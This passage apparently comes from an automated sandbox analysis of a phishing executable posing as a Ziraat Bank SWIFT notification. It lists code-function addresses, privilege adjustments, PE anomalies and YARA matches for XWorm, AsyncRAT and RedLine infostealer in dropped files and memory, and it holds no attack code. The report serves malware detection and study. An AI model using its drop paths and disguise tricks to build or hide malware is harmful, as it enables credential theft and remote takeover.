Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E8850	10_2_057E8850
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E0040	10_2_057E0040
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E0007	10_2_057E0007
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E8840	10_2_057E8840
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_0099CA20	12_2_0099CA20
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_0099AA63	12_2_0099AA63
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_00998789	12_2_00998789
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009BA810	12_2_009BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009979F0	12_2_009979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009B92A0	12_2_009B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009B93B0	12_2_009B93B0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_00997C00	12_2_00997C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009C2D40	12_2_009C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009BEEB0	12_2_009BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CD7C00	13_2_00CD7C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CFA810	13_2_00CFA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CD79F0	13_2_00CD79F0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00D02D40	13_2_00D02D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CF92A0	13_2_00CF92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CFEEB0	13_2_00CFEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CF93B0	13_2_00CF93B0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFC668	17_2_00AFC668
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_0340515C	17_2_0340515C
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C6EAF	17_2_033C6EAF
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033F5980	17_2_033F5980
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C51EE	17_2_033C51EE
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_034039A3	17_2_034039A3
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C7F80	17_2_033C7F80
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033F3780	17_2_033F3780
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033FC7F0	17_2_033FC7F0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033FD580	17_2_033FD580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1385	19_2_02CC1385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1315	19_2_02CC1315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1335	19_2_02CC1335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1021	19_2_02CC1021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1030	19_2_02CC1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05A305E8	19_2_05A305E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05A305F8	19_2_05A305F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFC3C8130E9	21_2_00007FFC3C8130E9

Enables driver privileges

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Enables security privileges

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: String function: 00420AE3 appears 70 times

PE file contains executable resources (Code or Archives)

Source: chrmstp.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: updater.exe.2.dr	Static PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
Source: Acrobat.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4

PE file contains more sections than normal

Source: notification_helper.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: msedgewebview2.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: identity_helper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: elevated_tracing_service.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: pwahelper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: chrmstp.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: notification_click_helper.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: setup.exe0.2.dr	Static PE information: Number of sections : 13 > 10
Source: firefox.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: os_update_handler.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: setup.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe.2.dr	Static PE information: Number of sections : 12 > 10

Sample file is different than original file name gathered from version info

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257862399.0000000003F40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253495338.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Uses 32bit PE files

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Yara signature match

Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.niellist.exe.4000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.niellist.exe.4d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 00000009.00000002.1304482234.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.1415424973.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1302912222.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: niellist.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: os_update_handler.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
